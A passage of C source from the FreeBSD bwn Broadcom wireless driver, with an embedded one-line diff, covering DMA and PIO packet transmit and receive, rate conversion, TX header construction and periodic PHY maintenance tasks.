meta->mt_dmap = dr->dr_spare_dmap; dr->dr_spare_dmap = map; back: /* * Clear RX buf header */ hdr = mtod(meta->mt_m, struct bwn_rxhdr4 *); bzero(hdr, sizeof(*hdr)); bus_dmamap_sync(dma->rxbuf_dtag, meta->mt_dmap, BUS_DMASYNC_PREWRITE); /* * Setup RX buf descriptor */ dr->setdesc(dr, desc, meta->mt_paddr, meta->mt_m->m_len - sizeof(*hdr), 0, 0, 0); return (error); } static void bwn_dma_buf_addr(void *arg, bus_dma_segment_t *seg, int nseg, bus_size_t mapsz __unused, int error) { if (!error) { KASSERT(nseg == 1, ("too many segments(%d)\n", nseg)); *((bus_addr_t *)arg) = seg->ds_addr; } } static int bwn_hwrate2ieeerate(int rate) { switch (rate) { case BWN_CCK_RATE_1MB: return (2); case BWN_CCK_RATE_2MB: return (4); case BWN_CCK_RATE_5MB: return (11); case BWN_CCK_RATE_11MB: return (22); case BWN_OFDM_RATE_6MB: return (12); case BWN_OFDM_RATE_9MB: return (18); case BWN_OFDM_RATE_12MB: return (24); case BWN_OFDM_RATE_18MB: return (36); case BWN_OFDM_RATE_24MB: return (48); case BWN_OFDM_RATE_36MB: return (72); case BWN_OFDM_RATE_48MB: return (96); case BWN_OFDM_RATE_54MB: return (108); default: printf("Ooops\n"); return (0); } } static void bwn_rxeof(struct bwn_mac *mac, struct mbuf *m, const void *_rxhdr) { const struct bwn_rxhdr4 *rxhdr = _rxhdr; struct bwn_plcp6 *plcp; struct bwn_softc *sc = mac->mac_sc; struct ieee80211_frame_min *wh; struct ieee80211_node *ni; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t macstat; int padding, 
rate, rssi = 0, noise = 0, type; uint16_t phytype, phystat0, phystat3, chanstat; unsigned char *mp = mtod(m, unsigned char *); static int rx_mac_dec_rpt = 0; BWN_ASSERT_LOCKED(sc); phystat0 = le16toh(rxhdr->phy_status0); phystat3 = le16toh(rxhdr->phy_status3); macstat = le32toh(rxhdr->mac_status); chanstat = le16toh(rxhdr->channel); phytype = chanstat & BWN_RX_CHAN_PHYTYPE; if (macstat & BWN_RX_MAC_FCSERR) device_printf(sc->sc_dev, "TODO RX: RX_FLAG_FAILED_FCS_CRC\n"); if (phystat0 & (BWN_RX_PHYST0_PLCPHCF | BWN_RX_PHYST0_PLCPFV)) device_printf(sc->sc_dev, "TODO RX: RX_FLAG_FAILED_PLCP_CRC\n"); if (macstat & BWN_RX_MAC_DECERR) goto drop; padding = (macstat & BWN_RX_MAC_PADDING) ? 2 : 0; if (m->m_pkthdr.len < (sizeof(struct bwn_plcp6) + padding)) { device_printf(sc->sc_dev, "frame too short (length=%d)\n", m->m_pkthdr.len); goto drop; } plcp = (struct bwn_plcp6 *)(mp + padding); m_adj(m, sizeof(struct bwn_plcp6) + padding); if (m->m_pkthdr.len < IEEE80211_MIN_LEN) { device_printf(sc->sc_dev, "frame too short (length=%d)\n", m->m_pkthdr.len); goto drop; } wh = mtod(m, struct ieee80211_frame_min *); if (macstat & BWN_RX_MAC_DEC && rx_mac_dec_rpt++ < 50) device_printf(sc->sc_dev, "RX decryption attempted (old %d keyidx %#x)\n", BWN_ISOLDFMT(mac), (macstat & BWN_RX_MAC_KEYIDX) >> BWN_RX_MAC_KEYIDX_SHIFT); /* XXX calculating RSSI & noise & antenna */ if (phystat0 & BWN_RX_PHYST0_OFDM) rate = bwn_plcp_get_ofdmrate(mac, plcp, phytype == BWN_PHYTYPE_A); else rate = bwn_plcp_get_cckrate(mac, plcp); if (rate == -1) { if (!(mac->mac_sc->sc_filters & BWN_MACCTL_PASS_BADPLCP)) goto drop; } sc->sc_rx_rate = bwn_hwrate2ieeerate(rate); /* RX radio tap */ if (ieee80211_radiotap_active(ic)) bwn_rx_radiotap(mac, m, rxhdr, plcp, rate, rssi, noise); m_adj(m, -IEEE80211_CRC_LEN); rssi = rxhdr->phy.abg.rssi; /* XXX incorrect RSSI calculation? */ noise = mac->mac_stats.link_noise; ifp->if_ipackets++; BWN_UNLOCK(sc); ni = ieee80211_find_rxnode(ic, wh); if (ni != NULL) { type = ieee80211_input(ni, m, rssi, noise); ieee80211_free_node(ni); } else type = ieee80211_input_all(ic, m, rssi, noise); BWN_LOCK(sc); return; drop: device_printf(sc->sc_dev, "%s: dropped\n", __func__); } static void bwn_dma_handle_txeof(struct bwn_mac *mac, const struct bwn_txstatus *status) { struct bwn_dma *dma = &mac->mac_method.dma; struct bwn_dma_ring *dr; struct bwn_dmadesc_generic *desc; struct bwn_dmadesc_meta *meta; struct bwn_softc *sc = mac->mac_sc; struct ieee80211_node *ni; struct ifnet *ifp = sc->sc_ifp; struct mbuf *m; int slot; BWN_ASSERT_LOCKED(sc); dr = bwn_dma_parse_cookie(mac, status, status->cookie, &slot); if (dr == NULL) { device_printf(sc->sc_dev, "failed to parse cookie\n"); return; } KASSERT(dr->dr_tx, ("%s:%d: fail", __func__, __LINE__)); while (1) { KASSERT(slot >= 0 && slot < dr->dr_numslots, ("%s:%d: fail", __func__, __LINE__)); dr->getdesc(dr, slot, &desc, &meta); if (meta->mt_txtype == BWN_DMADESC_METATYPE_HEADER) bus_dmamap_unload(dr->dr_txring_dtag, meta->mt_dmap); else if (meta->mt_txtype == BWN_DMADESC_METATYPE_BODY) bus_dmamap_unload(dma->txbuf_dtag, meta->mt_dmap); if (meta->mt_islast) { KASSERT(meta->mt_m != NULL, ("%s:%d: fail", __func__, __LINE__)); ni = meta->mt_ni; m = meta->mt_m; if (ni != NULL) { /* * Do any tx complete callback. Note this must * be done before releasing the node reference. 
*/ if (m->m_flags & M_TXCB) ieee80211_process_callback(ni, m, 0); ieee80211_free_node(ni); meta->mt_ni = NULL; } m_freem(m); meta->mt_m = NULL; } else { KASSERT(meta->mt_m == NULL, ("%s:%d: fail", __func__, __LINE__)); } dr->dr_usedslot--; if (meta->mt_islast) { ifp->if_opackets++; break; } slot = bwn_dma_nextslot(dr, slot); } sc->sc_watchdog_timer = 0; if (dr->dr_stop) { KASSERT(bwn_dma_freeslot(dr) >= BWN_TX_SLOTS_PER_FRAME, ("%s:%d: fail", __func__, __LINE__)); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; dr->dr_stop = 0; } } static void bwn_pio_handle_txeof(struct bwn_mac *mac, const struct bwn_txstatus *status) { struct bwn_pio_txqueue *tq; struct bwn_pio_txpkt *tp = NULL; struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; BWN_ASSERT_LOCKED(sc); tq = bwn_pio_parse_cookie(mac, status->cookie, &tp); if (tq == NULL) return; tq->tq_used -= roundup(tp->tp_m->m_pkthdr.len + BWN_HDRSIZE(mac), 4); tq->tq_free++; if (tp->tp_ni != NULL) { /* * Do any tx complete callback. Note this must * be done before releasing the node reference. */ if (tp->tp_m->m_flags & M_TXCB) ieee80211_process_callback(tp->tp_ni, tp->tp_m, 0); ieee80211_free_node(tp->tp_ni); tp->tp_ni = NULL; } m_freem(tp->tp_m); tp->tp_m = NULL; TAILQ_INSERT_TAIL(&tq->tq_pktlist, tp, tp_list); ifp->if_opackets++; sc->sc_watchdog_timer = 0; if (tq->tq_stop) { ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; tq->tq_stop = 0; } } static void bwn_phy_txpower_check(struct bwn_mac *mac, uint32_t flags) { struct bwn_softc *sc = mac->mac_sc; struct bwn_phy *phy = &mac->mac_phy; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; unsigned long now; int result; BWN_GETTIME(now); if (!(flags & BWN_TXPWR_IGNORE_TIME) && time_before(now, phy->nexttime)) return; phy->nexttime = now + 2 * 1000; if (siba_get_pci_subvendor(sc->sc_dev) == SIBA_BOARDVENDOR_BCM && siba_get_pci_subdevice(sc->sc_dev) == SIBA_BOARD_BU4306) return; if (phy->recalc_txpwr != NULL) { result = phy->recalc_txpwr(mac, (flags & BWN_TXPWR_IGNORE_TSSI) ? 1 : 0); if (result == BWN_TXPWR_RES_DONE) return; KASSERT(result == BWN_TXPWR_RES_NEED_ADJUST, ("%s: fail", __func__)); KASSERT(phy->set_txpwr != NULL, ("%s: fail", __func__)); ieee80211_runtask(ic, &mac->mac_txpower); } } static uint16_t bwn_pio_rx_read_2(struct bwn_pio_rxqueue *prq, uint16_t offset) { return (BWN_READ_2(prq->prq_mac, prq->prq_base + offset)); } static uint32_t bwn_pio_rx_read_4(struct bwn_pio_rxqueue *prq, uint16_t offset) { return (BWN_READ_4(prq->prq_mac, prq->prq_base + offset)); } static void bwn_pio_rx_write_2(struct bwn_pio_rxqueue *prq, uint16_t offset, uint16_t value) { BWN_WRITE_2(prq->prq_mac, prq->prq_base + offset, value); } static void bwn_pio_rx_write_4(struct bwn_pio_rxqueue *prq, uint16_t offset, uint32_t value) { BWN_WRITE_4(prq->prq_mac, prq->prq_base + offset, value); } static int bwn_ieeerate2hwrate(struct bwn_softc *sc, int rate) { switch (rate) { /* OFDM rates (cf IEEE Std 802.11a-1999, pp. 
14 Table 80) */ case 12: return (BWN_OFDM_RATE_6MB); case 18: return (BWN_OFDM_RATE_9MB); case 24: return (BWN_OFDM_RATE_12MB); case 36: return (BWN_OFDM_RATE_18MB); case 48: return (BWN_OFDM_RATE_24MB); case 72: return (BWN_OFDM_RATE_36MB); case 96: return (BWN_OFDM_RATE_48MB); case 108: return (BWN_OFDM_RATE_54MB); /* CCK rates (NB: not IEEE std, device-specific) */ case 2: return (BWN_CCK_RATE_1MB); case 4: return (BWN_CCK_RATE_2MB); case 11: return (BWN_CCK_RATE_5MB); case 22: return (BWN_CCK_RATE_11MB); } device_printf(sc->sc_dev, "unsupported rate %d\n", rate); return (BWN_CCK_RATE_1MB); } static int bwn_set_txhdr(struct bwn_mac *mac, struct ieee80211_node *ni, struct mbuf *m, struct bwn_txhdr *txhdr, uint16_t cookie) { const struct bwn_phy *phy = &mac->mac_phy; struct bwn_softc *sc = mac->mac_sc; struct ieee80211_frame *wh; struct ieee80211_frame *protwh; struct ieee80211_frame_cts *cts; struct ieee80211_frame_rts *rts; const struct ieee80211_txparam *tp; struct ieee80211vap *vap = ni->ni_vap; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct mbuf *mprot; unsigned int len; uint32_t macctl = 0; int protdur, rts_rate, rts_rate_fb, ismcast, isshort, rix, type; uint16_t phyctl = 0; uint8_t rate, rate_fb; wh = mtod(m, struct ieee80211_frame *); memset(txhdr, 0, sizeof(*txhdr)); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; ismcast = IEEE80211_IS_MULTICAST(wh->i_addr1); isshort = (ic->ic_flags & IEEE80211_F_SHPREAMBLE) != 0; /* * Find TX rate */ tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; if (type != IEEE80211_FC0_TYPE_DATA || (m->m_flags & M_EAPOL)) rate = rate_fb = tp->mgmtrate; else if (ismcast) rate = rate_fb = tp->mcastrate; else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) rate = rate_fb = tp->ucastrate; else { rix = ieee80211_ratectl_rate(ni, NULL, 0); rate = ni->ni_txrate; if (rix > 0) rate_fb = ni->ni_rates.rs_rates[rix - 1] & IEEE80211_RATE_VAL; else rate_fb = rate; } sc->sc_tx_rate = rate; rate = bwn_ieeerate2hwrate(sc, rate); rate_fb = bwn_ieeerate2hwrate(sc, rate_fb); txhdr->phyrate = (BWN_ISOFDMRATE(rate)) ? bwn_plcp_getofdm(rate) : bwn_plcp_getcck(rate); bcopy(wh->i_fc, txhdr->macfc, sizeof(txhdr->macfc)); bcopy(wh->i_addr1, txhdr->addr1, IEEE80211_ADDR_LEN); if ((rate_fb == rate) || (*(u_int16_t *)wh->i_dur & htole16(0x8000)) || (*(u_int16_t *)wh->i_dur == htole16(0))) txhdr->dur_fb = *(u_int16_t *)wh->i_dur; else txhdr->dur_fb = ieee80211_compute_duration(ic->ic_rt, m->m_pkthdr.len, rate, isshort); /* XXX TX encryption */ bwn_plcp_genhdr(BWN_ISOLDFMT(mac) ? (struct bwn_plcp4 *)(&txhdr->body.old.plcp) : (struct bwn_plcp4 *)(&txhdr->body.new.plcp), m->m_pkthdr.len + IEEE80211_CRC_LEN, rate); bwn_plcp_genhdr((struct bwn_plcp4 *)(&txhdr->plcp_fb), m->m_pkthdr.len + IEEE80211_CRC_LEN, rate_fb); txhdr->eftypes |= (BWN_ISOFDMRATE(rate_fb)) ? BWN_TX_EFT_FB_OFDM : BWN_TX_EFT_FB_CCK; txhdr->chan = phy->chan; phyctl |= (BWN_ISOFDMRATE(rate)) ? 
BWN_TX_PHY_ENC_OFDM : BWN_TX_PHY_ENC_CCK; if (isshort && (rate == BWN_CCK_RATE_2MB || rate == BWN_CCK_RATE_5MB || rate == BWN_CCK_RATE_11MB)) phyctl |= BWN_TX_PHY_SHORTPRMBL; /* XXX TX antenna selection */ switch (bwn_antenna_sanitize(mac, 0)) { case 0: phyctl |= BWN_TX_PHY_ANT01AUTO; break; case 1: phyctl |= BWN_TX_PHY_ANT0; break; case 2: phyctl |= BWN_TX_PHY_ANT1; break; case 3: phyctl |= BWN_TX_PHY_ANT2; break; case 4: phyctl |= BWN_TX_PHY_ANT3; break; default: KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } if (!ismcast) macctl |= BWN_TX_MAC_ACK; macctl |= (BWN_TX_MAC_HWSEQ | BWN_TX_MAC_START_MSDU); if (!IEEE80211_IS_MULTICAST(wh->i_addr1) && m->m_pkthdr.len + IEEE80211_CRC_LEN > vap->iv_rtsthreshold) macctl |= BWN_TX_MAC_LONGFRAME; if (ic->ic_flags & IEEE80211_F_USEPROT) { /* XXX RTS rate is always 1MB??? */ rts_rate = BWN_CCK_RATE_1MB; rts_rate_fb = bwn_get_fbrate(rts_rate); protdur = ieee80211_compute_duration(ic->ic_rt, m->m_pkthdr.len, rate, isshort) + + ieee80211_ack_duration(ic->ic_rt, rate, isshort); if (ic->ic_protmode == IEEE80211_PROT_CTSONLY) { cts = (struct ieee80211_frame_cts *)(BWN_ISOLDFMT(mac) ? (txhdr->body.old.rts_frame) : (txhdr->body.new.rts_frame)); mprot = ieee80211_alloc_cts(ic, ni->ni_vap->iv_myaddr, protdur); KASSERT(mprot != NULL, ("failed to alloc mbuf\n")); bcopy(mtod(mprot, uint8_t *), (uint8_t *)cts, mprot->m_pkthdr.len); m_freem(mprot); macctl |= BWN_TX_MAC_SEND_CTSTOSELF; len = sizeof(struct ieee80211_frame_cts); } else { rts = (struct ieee80211_frame_rts *)(BWN_ISOLDFMT(mac) ? (txhdr->body.old.rts_frame) : (txhdr->body.new.rts_frame)); protdur += ieee80211_ack_duration(ic->ic_rt, rate, isshort); mprot = ieee80211_alloc_rts(ic, wh->i_addr1, wh->i_addr2, protdur); KASSERT(mprot != NULL, ("failed to alloc mbuf\n")); bcopy(mtod(mprot, uint8_t *), (uint8_t *)rts, mprot->m_pkthdr.len); m_freem(mprot); macctl |= BWN_TX_MAC_SEND_RTSCTS; len = sizeof(struct ieee80211_frame_rts); } len += IEEE80211_CRC_LEN; bwn_plcp_genhdr((struct bwn_plcp4 *)((BWN_ISOLDFMT(mac)) ? &txhdr->body.old.rts_plcp : &txhdr->body.new.rts_plcp), len, rts_rate); bwn_plcp_genhdr((struct bwn_plcp4 *)&txhdr->rts_plcp_fb, len, rts_rate_fb); protwh = (struct ieee80211_frame *)(BWN_ISOLDFMT(mac) ? (&txhdr->body.old.rts_frame) : (&txhdr->body.new.rts_frame)); txhdr->rts_dur_fb = *(u_int16_t *)protwh->i_dur; if (BWN_ISOFDMRATE(rts_rate)) { txhdr->eftypes |= BWN_TX_EFT_RTS_OFDM; txhdr->phyrate_rts = bwn_plcp_getofdm(rts_rate); } else { txhdr->eftypes |= BWN_TX_EFT_RTS_CCK; txhdr->phyrate_rts = bwn_plcp_getcck(rts_rate); } txhdr->eftypes |= (BWN_ISOFDMRATE(rts_rate_fb)) ? 
BWN_TX_EFT_RTS_FBOFDM : BWN_TX_EFT_RTS_FBCCK; } if (BWN_ISOLDFMT(mac)) txhdr->body.old.cookie = htole16(cookie); else txhdr->body.new.cookie = htole16(cookie); txhdr->macctl = htole32(macctl); txhdr->phyctl = htole16(phyctl); /* * TX radio tap */ if (ieee80211_radiotap_active_vap(vap)) { sc->sc_tx_th.wt_flags = 0;
-		if (wh->i_fc[1] & IEEE80211_FC1_WEP)
+		if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED)
sc->sc_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_WEP; if (isshort && (rate == BWN_CCK_RATE_2MB || rate == BWN_CCK_RATE_5MB || rate == BWN_CCK_RATE_11MB)) sc->sc_tx_th.wt_flags |= IEEE80211_RADIOTAP_F_SHORTPRE; sc->sc_tx_th.wt_rate = rate; ieee80211_radiotap_tx(vap, m); } return (0); } static void bwn_plcp_genhdr(struct bwn_plcp4 *plcp, const uint16_t octets, const uint8_t rate) { uint32_t d, plen; uint8_t *raw = plcp->o.raw; if (BWN_ISOFDMRATE(rate)) { d = bwn_plcp_getofdm(rate); KASSERT(!(octets & 0xf000), ("%s:%d: fail", __func__, __LINE__)); d |= (octets << 5); plcp->o.data = htole32(d); } else { plen = octets * 16 / rate; if ((octets * 16 % rate) > 0) { plen++; if ((rate == BWN_CCK_RATE_11MB) && ((octets * 8 % 11) < 4)) { raw[1] = 0x84; } else raw[1] = 0x04; } else raw[1] = 0x04; plcp->o.data |= htole32(plen << 16); raw[0] = bwn_plcp_getcck(rate); } } static uint8_t bwn_antenna_sanitize(struct bwn_mac *mac, uint8_t n) { struct bwn_softc *sc = mac->mac_sc; uint8_t mask; if (n == 0) return (0); if (mac->mac_phy.gmode) mask = siba_sprom_get_ant_bg(sc->sc_dev); else mask = siba_sprom_get_ant_a(sc->sc_dev); if (!(mask & (1 << (n - 1)))) return (0); return (n); } static uint8_t bwn_get_fbrate(uint8_t bitrate) { switch (bitrate) { case BWN_CCK_RATE_1MB: return (BWN_CCK_RATE_1MB); case BWN_CCK_RATE_2MB: return (BWN_CCK_RATE_1MB); case BWN_CCK_RATE_5MB: return (BWN_CCK_RATE_2MB); case BWN_CCK_RATE_11MB: return (BWN_CCK_RATE_5MB); case BWN_OFDM_RATE_6MB: return (BWN_CCK_RATE_5MB); case BWN_OFDM_RATE_9MB: return (BWN_OFDM_RATE_6MB); case BWN_OFDM_RATE_12MB: return (BWN_OFDM_RATE_9MB); case BWN_OFDM_RATE_18MB: return (BWN_OFDM_RATE_12MB); case BWN_OFDM_RATE_24MB: return (BWN_OFDM_RATE_18MB); case BWN_OFDM_RATE_36MB: return (BWN_OFDM_RATE_24MB); case BWN_OFDM_RATE_48MB: return (BWN_OFDM_RATE_36MB); case BWN_OFDM_RATE_54MB: return (BWN_OFDM_RATE_48MB); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); return (0); } static uint32_t bwn_pio_write_multi_4(struct bwn_mac *mac, struct bwn_pio_txqueue *tq, uint32_t ctl, const void *_data, int len) { struct bwn_softc *sc = mac->mac_sc; uint32_t value = 0; const uint8_t *data = _data; ctl |= BWN_PIO8_TXCTL_0_7 | BWN_PIO8_TXCTL_8_15 | BWN_PIO8_TXCTL_16_23 | BWN_PIO8_TXCTL_24_31; bwn_pio_write_4(mac, tq, BWN_PIO8_TXCTL, ctl); siba_write_multi_4(sc->sc_dev, data, (len & ~3), tq->tq_base + BWN_PIO8_TXDATA); if (len & 3) { ctl &= ~(BWN_PIO8_TXCTL_8_15 | BWN_PIO8_TXCTL_16_23 | BWN_PIO8_TXCTL_24_31); data = &(data[len - 1]); switch (len & 3) { case 3: ctl |= BWN_PIO8_TXCTL_16_23; value |= (uint32_t)(*data) << 16; data--; case 2: ctl |= BWN_PIO8_TXCTL_8_15; value |= (uint32_t)(*data) << 8; data--; case 1: value |= (uint32_t)(*data); } bwn_pio_write_4(mac, tq, BWN_PIO8_TXCTL, ctl); bwn_pio_write_4(mac, tq, BWN_PIO8_TXDATA, value); } return (ctl); } static void bwn_pio_write_4(struct bwn_mac *mac, struct bwn_pio_txqueue *tq, uint16_t offset, uint32_t value) { BWN_WRITE_4(mac, tq->tq_base + offset, value); } static uint16_t bwn_pio_write_multi_2(struct bwn_mac *mac, struct bwn_pio_txqueue *tq, uint16_t ctl, const void *_data, int len) { struct bwn_softc *sc = mac->mac_sc;
const uint8_t *data = _data; ctl |= BWN_PIO_TXCTL_WRITELO | BWN_PIO_TXCTL_WRITEHI; BWN_PIO_WRITE_2(mac, tq, BWN_PIO_TXCTL, ctl); siba_write_multi_2(sc->sc_dev, data, (len & ~1), tq->tq_base + BWN_PIO_TXDATA); if (len & 1) { ctl &= ~BWN_PIO_TXCTL_WRITEHI; BWN_PIO_WRITE_2(mac, tq, BWN_PIO_TXCTL, ctl); BWN_PIO_WRITE_2(mac, tq, BWN_PIO_TXDATA, data[len - 1]); } return (ctl); } static uint16_t bwn_pio_write_mbuf_2(struct bwn_mac *mac, struct bwn_pio_txqueue *tq, uint16_t ctl, struct mbuf *m0) { int i, j = 0; uint16_t data = 0; const uint8_t *buf; struct mbuf *m = m0; ctl |= BWN_PIO_TXCTL_WRITELO | BWN_PIO_TXCTL_WRITEHI; BWN_PIO_WRITE_2(mac, tq, BWN_PIO_TXCTL, ctl); for (; m != NULL; m = m->m_next) { buf = mtod(m, const uint8_t *); for (i = 0; i < m->m_len; i++) { if (!((j++) % 2)) data |= buf[i]; else { data |= (buf[i] << 8); BWN_PIO_WRITE_2(mac, tq, BWN_PIO_TXDATA, data); data = 0; } } } if (m0->m_pkthdr.len % 2) { ctl &= ~BWN_PIO_TXCTL_WRITEHI; BWN_PIO_WRITE_2(mac, tq, BWN_PIO_TXCTL, ctl); BWN_PIO_WRITE_2(mac, tq, BWN_PIO_TXDATA, data); } return (ctl); } static void bwn_set_slot_time(struct bwn_mac *mac, uint16_t time) { if (mac->mac_phy.type != BWN_PHYTYPE_G) return; BWN_WRITE_2(mac, 0x684, 510 + time); bwn_shm_write_2(mac, BWN_SHARED, 0x0010, time); } static struct bwn_dma_ring * bwn_dma_select(struct bwn_mac *mac, uint8_t prio) { if ((mac->mac_flags & BWN_MAC_FLAG_WME) == 0) return (mac->mac_method.dma.wme[WME_AC_BE]); switch (prio) { case 3: return (mac->mac_method.dma.wme[WME_AC_VO]); case 2: return (mac->mac_method.dma.wme[WME_AC_VI]); case 0: return (mac->mac_method.dma.wme[WME_AC_BE]); case 1: return (mac->mac_method.dma.wme[WME_AC_BK]); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); return (NULL); } static int bwn_dma_getslot(struct bwn_dma_ring *dr) { int slot; BWN_ASSERT_LOCKED(dr->dr_mac->mac_sc); KASSERT(dr->dr_tx, ("%s:%d: fail", __func__, __LINE__)); KASSERT(!(dr->dr_stop), ("%s:%d: fail", __func__, __LINE__)); KASSERT(bwn_dma_freeslot(dr) != 0, ("%s:%d: fail", __func__, __LINE__)); slot = bwn_dma_nextslot(dr, dr->dr_curslot); KASSERT(!(slot & ~0x0fff), ("%s:%d: fail", __func__, __LINE__)); dr->dr_curslot = slot; dr->dr_usedslot++; return (slot); } static int bwn_phy_shm_tssi_read(struct bwn_mac *mac, uint16_t shm_offset) { const uint8_t ofdm = (shm_offset != BWN_SHARED_TSSI_CCK); unsigned int a, b, c, d; unsigned int avg; uint32_t tmp; tmp = bwn_shm_read_4(mac, BWN_SHARED, shm_offset); a = tmp & 0xff; b = (tmp >> 8) & 0xff; c = (tmp >> 16) & 0xff; d = (tmp >> 24) & 0xff; if (a == 0 || a == BWN_TSSI_MAX || b == 0 || b == BWN_TSSI_MAX || c == 0 || c == BWN_TSSI_MAX || d == 0 || d == BWN_TSSI_MAX) return (ENOENT); bwn_shm_write_4(mac, BWN_SHARED, shm_offset, BWN_TSSI_MAX | (BWN_TSSI_MAX << 8) | (BWN_TSSI_MAX << 16) | (BWN_TSSI_MAX << 24)); if (ofdm) { a = (a + 32) & 0x3f; b = (b + 32) & 0x3f; c = (c + 32) & 0x3f; d = (d + 32) & 0x3f; } avg = (a + b + c + d + 2) / 4; if (ofdm) { if (bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_HFLO) & BWN_HF_4DB_CCK_POWERBOOST) avg = (avg >= 13) ? 
(avg - 13) : 0; } return (avg); } static void bwn_phy_g_setatt(struct bwn_mac *mac, int *bbattp, int *rfattp) { struct bwn_txpwr_loctl *lo = &mac->mac_phy.phy_g.pg_loctl; int rfatt = *rfattp; int bbatt = *bbattp; while (1) { if (rfatt > lo->rfatt.max && bbatt > lo->bbatt.max - 4) break; if (rfatt < lo->rfatt.min && bbatt < lo->bbatt.min + 4) break; if (bbatt > lo->bbatt.max && rfatt > lo->rfatt.max - 1) break; if (bbatt < lo->bbatt.min && rfatt < lo->rfatt.min + 1) break; if (bbatt > lo->bbatt.max) { bbatt -= 4; rfatt += 1; continue; } if (bbatt < lo->bbatt.min) { bbatt += 4; rfatt -= 1; continue; } if (rfatt > lo->rfatt.max) { rfatt -= 1; bbatt += 4; continue; } if (rfatt < lo->rfatt.min) { rfatt += 1; bbatt -= 4; continue; } break; } *rfattp = MIN(MAX(rfatt, lo->rfatt.min), lo->rfatt.max); *bbattp = MIN(MAX(bbatt, lo->bbatt.min), lo->bbatt.max); } static void bwn_phy_lock(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; struct ieee80211com *ic = sc->sc_ifp->if_l2com; KASSERT(siba_get_revid(sc->sc_dev) >= 3, ("%s: unsupported rev %d", __func__, siba_get_revid(sc->sc_dev))); if (ic->ic_opmode != IEEE80211_M_HOSTAP) bwn_psctl(mac, BWN_PS_AWAKE); } static void bwn_phy_unlock(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; struct ieee80211com *ic = sc->sc_ifp->if_l2com; KASSERT(siba_get_revid(sc->sc_dev) >= 3, ("%s: unsupported rev %d", __func__, siba_get_revid(sc->sc_dev))); if (ic->ic_opmode != IEEE80211_M_HOSTAP) bwn_psctl(mac, 0); } static void bwn_rf_lock(struct bwn_mac *mac) { BWN_WRITE_4(mac, BWN_MACCTL, BWN_READ_4(mac, BWN_MACCTL) | BWN_MACCTL_RADIO_LOCK); BWN_READ_4(mac, BWN_MACCTL); DELAY(10); } static void bwn_rf_unlock(struct bwn_mac *mac) { BWN_READ_2(mac, BWN_PHYVER); BWN_WRITE_4(mac, BWN_MACCTL, BWN_READ_4(mac, BWN_MACCTL) & ~BWN_MACCTL_RADIO_LOCK); } static struct bwn_pio_txqueue * bwn_pio_parse_cookie(struct bwn_mac *mac, uint16_t cookie, struct bwn_pio_txpkt **pack) { struct bwn_pio *pio = &mac->mac_method.pio; struct bwn_pio_txqueue *tq = NULL; unsigned int index; switch (cookie & 0xf000) { case 0x1000: tq = &pio->wme[WME_AC_BK]; break; case 0x2000: tq = &pio->wme[WME_AC_BE]; break; case 0x3000: tq = &pio->wme[WME_AC_VI]; break; case 0x4000: tq = &pio->wme[WME_AC_VO]; break; case 0x5000: tq = &pio->mcast; break; } KASSERT(tq != NULL, ("%s:%d: fail", __func__, __LINE__)); if (tq == NULL) return (NULL); index = (cookie & 0x0fff); KASSERT(index < N(tq->tq_pkts), ("%s:%d: fail", __func__, __LINE__)); if (index >= N(tq->tq_pkts)) return (NULL); *pack = &tq->tq_pkts[index]; KASSERT(*pack != NULL, ("%s:%d: fail", __func__, __LINE__)); return (tq); } static void bwn_txpwr(void *arg, int npending) { struct bwn_mac *mac = arg; struct bwn_softc *sc = mac->mac_sc; BWN_LOCK(sc); if (mac && mac->mac_status >= BWN_MAC_STATUS_STARTED && mac->mac_phy.set_txpwr != NULL) mac->mac_phy.set_txpwr(mac); BWN_UNLOCK(sc); } static void bwn_task_15s(struct bwn_mac *mac) { uint16_t reg; if (mac->mac_fw.opensource) { reg = bwn_shm_read_2(mac, BWN_SCRATCH, BWN_WATCHDOG_REG); if (reg) { bwn_restart(mac, "fw watchdog"); return; } bwn_shm_write_2(mac, BWN_SCRATCH, BWN_WATCHDOG_REG, 1); } if (mac->mac_phy.task_15s) mac->mac_phy.task_15s(mac); mac->mac_phy.txerrors = BWN_TXERROR_MAX; } static void bwn_task_30s(struct bwn_mac *mac) { if (mac->mac_phy.type != BWN_PHYTYPE_G || mac->mac_noise.noi_running) return; mac->mac_noise.noi_running = 1; mac->mac_noise.noi_nsamples = 0; bwn_noise_gensample(mac); } static void bwn_task_60s(struct bwn_mac *mac) { if (mac->mac_phy.task_60s) 
		mac->mac_phy.task_60s(mac);
	bwn_phy_txpower_check(mac, BWN_TXPWR_IGNORE_TIME);
}

static void
bwn_tasks(void *arg)
{
	struct bwn_mac *mac = arg;
	struct bwn_softc *sc = mac->mac_sc;

	BWN_ASSERT_LOCKED(sc);
	if (mac->mac_status != BWN_MAC_STATUS_STARTED)
		return;

	if (mac->mac_task_state % 4 == 0)
		bwn_task_60s(mac);
	if (mac->mac_task_state % 2 == 0)
		bwn_task_30s(mac);
	bwn_task_15s(mac);
	mac->mac_task_state++;
	callout_reset(&sc->sc_task_ch, hz * 15, bwn_tasks, mac);
}

static int
bwn_plcp_get_ofdmrate(struct bwn_mac *mac, struct bwn_plcp6 *plcp, uint8_t a)
{
	struct bwn_softc *sc = mac->mac_sc;

	KASSERT(a == 0, ("not support APHY\n"));

	switch (plcp->o.raw[0] & 0xf) {
	case 0xb:
		return (BWN_OFDM_RATE_6MB);
	case 0xf:
		return (BWN_OFDM_RATE_9MB);
	case 0xa:
		return (BWN_OFDM_RATE_12MB);
	case 0xe:
		return (BWN_OFDM_RATE_18MB);
	case 0x9:
		return (BWN_OFDM_RATE_24MB);
	case 0xd:
